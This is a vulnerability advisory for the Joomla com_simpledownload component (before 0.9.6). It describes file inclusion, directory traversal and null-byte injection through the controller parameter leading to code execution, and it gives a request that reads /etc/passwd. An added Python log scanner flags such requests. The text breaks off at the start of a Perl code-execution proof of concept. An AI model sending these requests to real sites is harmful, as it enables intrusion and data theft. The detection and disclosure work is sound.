--[Description]--
A vulnerability has been found in the downloader component for Joomla. It can be exploited in various ways, from sensitive information disclosure to remote code execution.
Input passed to the controller parameter is not properly sanitized, allowing an attacker to inject PHP code via Local File Inclusion combined with Directory Traversal (/proc/self/environ method) and Null Byte Injection, leading to Remote Code Execution.
--[Vendor]--
http://joomla.joelrowley.com/
--[Vulnerable Version]--
com_simpledownload <0.9.6
--[Impact]--
Local File Inclusion
Directory Traversal
Remote Code Execution
--[LFI Exploit]--
/index2.php?option=com_simpledownload&controller=[LFI]%00
--[LFI PoC]--
/index2.php?option=com_simpledownload&controller=./../../../../../../../etc/passwd%00
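Added example (not part of the original advisory): a log check for the request shape described above, flagging com_simpledownload requests whose controller value contains traversal sequences or a null byte. The log lines are constructed, and the rule that a legitimate controller value is a plain identifier (such as the sample value "simpledownload") is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: a legitimate controller name is a plain identifier.
SAFE_CONTROLLER = re.compile(r"[A-Za-z0-9_]*")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation IP ranges).
SAMPLE_LOG = '''\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index2.php?option=com_simpledownload&controller=simpledownload HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index2.php?option=com_simpledownload&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 200 1893
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index2.php?option=com_simpledownload&controller=%252e%252e%252fconfiguration HTTP/1.1" 200 20
192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 4096
'''

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(url):
    """Return None for other components, else a list of findings ([] = clean)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "com_simpledownload" not in params.get("option", []):
        return None
    reasons = []
    for raw in params.get("controller", []):
        value = fully_decode(raw)  # parse_qs has already decoded one layer
        if "\x00" in value:
            reasons.append("null-byte")
        if ".." in value or "/" in value or "\\" in value:
            reasons.append("path-traversal")
        if not reasons and not SAFE_CONTROLLER.fullmatch(value):
            reasons.append("unexpected-characters")
    return reasons

def scan(log_text):
    """Return (client_ip, findings) for each suspicious com_simpledownload request."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match:
            reasons = classify(match.group(1))
            if reasons:
                hits.append((line.split()[0], reasons))
    return hits
```

The same allowlist test, applied to the controller value before it is used to build a file path, is the corresponding input-validation fix.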
--[RCE PoC]--
#!/usr/bin/perl -w
# quick'n'dirty PoC for RCE
# com_simpledownload <0.9.6
# by